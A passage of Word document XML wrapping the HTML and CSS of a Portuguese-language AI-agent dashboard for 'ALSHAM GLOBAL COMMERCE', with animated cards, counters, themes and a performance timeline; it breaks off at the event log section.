    </w:p>
    <w:p w14:paraId="14BEF0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border-left: 3px solid var(--accent-primary);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C15E6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translateX(-20px);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3F95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transition: all 0.3s ease;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="754BA6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2361EFF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="215001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.event-item:hover {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1558E4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rgba(255,255,255,0.1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E533C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transform: translateX(0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3F23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350711D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="501041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ANIMATIONS === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAC93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@keyframes rotate {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B3C4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from { transform: rotate(0deg); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307A3E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to { transform: rotate(360deg); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CAF3A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9607242" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="140C3C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@keyframes gradient-shift {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348AEA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0%, 100% { background-position: 0% 50%; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5044C2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50% { background-position: 100% 50%; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D8A3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A132563" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B8E01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@keyframes pulse-glow {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D047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0%, 100% { text-shadow: 0 0 30px var(--accent-primary); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E43D6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50% { text-shadow: 0 0 50px var(--accent-primary), 0 0 70px var(--accent-primary); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B929A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22CF329" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217951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@keyframes float {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462CDB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0%, 100% { transform: translateY(0px); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E162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50% { transform: translateY(-10px); }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9667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B0598A3" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50BD90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RESPONSIVE === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13666F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@media (max-width: 768px) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC922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.mega-counter-number { font-size: 2.5rem; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E4E00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.theme-selector { top: 1rem; right: 1rem; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217A86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.card-3d { padding: 1.5rem; }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="748362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F5D37F8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="663915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/* === UTILITY CLASSES === */</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3702C1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.text-gradient {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FBCC8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linear-gradient(45deg, var(--accent-primary), var(--accent-secondary));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085795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-webkit-background-clip: text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="231AA9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-webkit-text-fill-color: transparent;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DCA7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background-clip: text;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C01F9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32C740FE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="211527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.glow-text {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="439BB0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text-shadow: 0 0 20px currentColor;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D2F6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6420F46" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F50C0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.floating {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68025B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animation: float 3s ease-in-out infinite;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6B2F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4169D66" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02A133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.connection-status {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D42F4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display: inline-block;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB145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width: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07C50A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height: 8px;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3A8F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border-radius: 50%;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA368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#ff4444;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29FC1F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margin-right: 0.5rem;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48559E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7B3631A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57EDA3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.connection-status.connected {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A280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background: #44ff44;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3354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F46DF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&lt;/style&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D097E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&lt;/head&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003F76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&lt;body class="theme-luxury-glass"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA4FE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Particles Background --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC26F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&lt;div id="particles-container"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0746D9AC" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44194D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Theme Selector --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19C627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&lt;div class="theme-selector"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DC21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class="theme-btn theme-luxury-glass-btn active" data-theme="luxury-glass" title="Luxury Glass"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550CA2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class="theme-btn theme-quantum-void-btn" data-theme="quantum-void" title="Quantum Void"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D472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class="theme-btn theme-neural-twilight-btn" data-theme="neural-twilight" title="Neural Twilight"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="513045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class="theme-btn theme-cyber-aurora-btn" data-theme="cyber-aurora" title="Cyber Aurora"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E0DB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class="theme-btn theme-transcendental-light-btn" data-theme="transcendental-light" title="Transcendental Light"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245715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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BEFBA93" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76D55E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Micro Update Popup --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F46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&lt;div id="micro-update" class="micro-update"&gt;&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63657883" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46CD14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Main Container --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4491B3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&lt;div class="container mx-auto px-4 py-8"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248FFA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Header --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429A4F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&lt;header class="text-center mb-12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34DC85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&lt;h1 class="text-6xl font-bold mb-4 floating"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0ADC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&lt;span class="text-gradient glow-text"&gt;ALSHAM GLOBAL COMMERCE&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC24F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&lt;/h1&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B7DD2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&lt;p class="text-xl mb-4"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧬</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Centro de Excelência em Inteligência Artificial&lt;/p&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350192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class="inline-flex items-center px-6 py-3 rounded-full" style="background: var(--accent-primary)20; color: var(--accent-primary);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1851B7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&lt;i class="fas fa-gem mr-2"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E9D9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&lt;span class="font-bold"&gt;R$ 1.430.000&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5337BC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1C364F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class="mt-4 text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A85BF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&lt;span class="connection-status" id="connection-indicator"&gt;&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281D46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&lt;span id="connection-text"&gt;Conectando...&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06204A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1FC4C0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&lt;/header&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A28B634" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66E2DE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Mega Counter --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288861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class="card-3d mega-counter mb-12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130733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class="mega-counter-number" id="mega-counter"&gt;0&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165B4D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class="mega-counter-label"&gt;CICLOS TOTAIS EXECUTADOS&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A92A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class="uptime-display" id="uptime-display"&gt;Uptime: 0d 0h 0m&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCB4F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class="text-sm mt-2" style="color: var(--text-secondary);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7B6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&lt;span id="cycles-per-second"&gt;0.000&lt;/span&gt; ciclos/segundo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E087C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66AFBC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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE1EB87" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C1586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System Overview --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DA16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class="grid grid-cols-1 md:grid-cols-4 gap-6 mb-12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699EAB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class="card-3d text-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0733CB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class="text-3xl font-bold mb-2" style="color: var(--accent-secondary);" id="overall-performance"&gt;85%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69167A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class="text-sm" style="color: var(--text-secondary);"&gt;Performance Geral&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6C63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class="text-xs mt-2 opacity-75"&gt;Sistema Transcendental&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F26E2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51D90B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EA96B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class="card-3d text-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149EAE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class="text-3xl font-bold mb-2" style="color: var(--accent-primary);"&gt;3/3&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26A010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class="text-sm" style="color: var(--text-secondary);"&gt;Agentes Ativos&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A77B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class="text-xs mt-2 opacity-75"&gt;Core • Learn • Guard&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653380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03C5B0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21B5B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class="card-3d text-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8566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class="text-3xl font-bold mb-2" style="color: var(--accent-tertiary);"&gt;99.9%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EAC9E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class="text-sm" style="color: var(--text-secondary);"&gt;Uptime&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4438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class="text-xs mt-2 opacity-75"&gt;Disponibilidade Total&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="173CCF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12E8B4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45CC2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class="card-3d text-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758D84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class="text-3xl font-bold mb-2" style="color: var(--accent-secondary);" id="performance-indicator"&gt;Performance: 85%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5124E8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class="text-sm" style="color: var(--text-secondary);"&gt;Status&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1007C1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class="text-xs mt-2 opacity-75"&gt;Operacional&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149944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56D443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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28310F42" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7D231A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Agent Cards --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46CD39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class="grid grid-cols-1 md:grid-cols-3 gap-8 mb-12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1E66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&lt;!-- Core Agent --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B3DBC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class="card-3d agent-card" onclick="openModal('core')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A6A6C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&lt;i class="fas fa-brain agent-icon core-agent"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCBF2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&lt;h3 class="text-2xl font-bold mb-4"&gt;CORE AGENT&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E181E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4E4EF5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class="progress-ring"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="463933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&lt;svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6E61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&lt;circle class="ring-bg" cx="60" cy="60" r="50"&gt;&lt;/circle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A8F9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&lt;circle class="ring-progress" cx="60" cy="60" r="50" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11732C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stroke="#FF6B6B" id="core-progress"&gt;&lt;/circle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D10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&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C290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class="ring-text" id="core-performance"&gt;89%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232108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454E0D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5E602D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class="space-y-3 text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AACC7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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="415E1A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&lt;span&gt;Ciclos:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="521AC2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 class="font-bold" id="core-cycles"&gt;15&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B067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75880C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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F65EA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&lt;span&gt;Técnica:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DA30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 class="font-bold" id="core-technique"&gt;AutoML&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6487CA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48623E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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C0BB2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&lt;span&gt;Valor:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF1D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 class="font-bold" style="color: var(--accent-primary);"&gt;R$ 550k&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FB43E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10CF0E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726DB3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759F451B" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A2B06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&lt;!-- Learn Agent --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F9AF5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class="card-3d agent-card" onclick="openModal('learn')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BBAC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&lt;i class="fas fa-graduation-cap agent-icon learn-agent"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D230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&lt;h3 class="text-2xl font-bold mb-4"&gt;LEARN AGENT&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A62D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2C1BB8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class="progress-ring"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E9018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&lt;svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39118F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&lt;circle class="ring-bg" cx="60" cy="60" r="50"&gt;&lt;/circle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CD66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&lt;circle class="ring-progress" cx="60" cy="60" r="50" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD0E0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stroke="#9333EA" id="learn-progress"&gt;&lt;/circle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B494D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&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="062D42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class="ring-text" id="learn-performance"&gt;83%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116CFA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1CDE64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1AC6A2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class="space-y-3 text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="514A07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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2004F1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&lt;span&gt;Accuracy:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C3C1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 class="font-bold" id="learn-accuracy"&gt;94.7%&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E29E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78EED4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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D678B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&lt;span&gt;Modelo:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="085BC5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 class="font-bold" id="learn-model"&gt;Transformer&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C261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133126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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8E18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&lt;span&gt;Valor:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6946BE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 class="font-bold" style="color: var(--accent-primary);"&gt;R$ 550k&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A194C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179774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28631B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7D205952" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D0FA3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&lt;!-- Guard Agent --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFFC0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class="card-3d agent-card" onclick="openModal('guard')"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7F99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&lt;i class="fas fa-shield-alt agent-icon guard-agent"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0334FC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&lt;h3 class="text-2xl font-bold mb-4"&gt;GUARD AGENT&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22CC18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AD133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class="progress-ring"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C152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&lt;svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117C5A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&lt;circle class="ring-bg" cx="60" cy="60" r="50"&gt;&lt;/circle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A9897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&lt;circle class="ring-progress" cx="60" cy="60" r="50" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AF4C74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stroke="#00F5FF" id="guard-progress"&gt;&lt;/circle&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B8D8A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&lt;/svg&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF96C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class="ring-text" id="guard-uptime"&gt;100%&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EC295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49DFD7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2B5CF7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class="space-y-3 text-sm"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288C8A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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32A582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&lt;span&gt;Status:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="127F06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 class="font-bold" id="guard-status"&gt;NORMAL&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3BAB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423C3D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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0030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&lt;span&gt;Protocolo:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E56A7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 class="font-bold" id="guard-protocol"&gt;Threat Analysis&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5801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6431EC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 justify-between"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3953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&lt;span&gt;Valor:&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3456E8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&lt;span class="font-bold" style="color: var(--accent-primary);"&gt;R$ 330k&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052CB6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1F6978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2C3027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4E5DA9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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F71E0" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54D0A1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Timeline Chart --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62C501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class="card-3d mb-12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC68C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&lt;h3 class="text-2xl font-bold mb-6 flex items-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1BBF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&lt;i class="fas fa-chart-line mr-3" style="color: var(--accent-primary);"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398963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Timeline de Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C848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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C918F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style="height: 400px;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674B00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&lt;canvas id="timelineChart"&gt;&lt;/canvas&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435224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414663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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="445795B5" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F170A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Event Log --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620866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class="card-3d mb-12"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773FC9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&lt;h3 class="text-2xl font-bold mb-6 flex items-center"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6515B5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&lt;i class="fas fa-list-ul mr-3" style="color: var(--accent-secondary);"&gt;&lt;/i&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CF381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 Log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74BA11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class="ml-auto text-sm font-normal" style="color: var(--text-secondary);"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212F54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&lt;span id="ai-insight"&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Sistema operando em zona de transcendência&lt;/span&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC70A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01EACB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&lt;/h3&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277DC4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class="event-log" id="event-log"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF248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&lt;!-- Events will be populated here --&gt;</w:t>
      </w:r>
    </w:p>
